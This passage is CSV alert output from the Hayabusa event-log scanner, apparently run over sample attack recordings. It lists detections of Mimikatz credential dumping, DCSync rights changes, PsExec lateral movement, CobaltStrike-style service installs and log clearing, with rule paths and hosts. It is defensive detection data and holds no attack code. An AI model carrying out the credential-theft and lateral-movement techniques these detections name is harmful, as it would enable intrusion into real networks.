+09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 
0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted 
payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as 
Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-22 
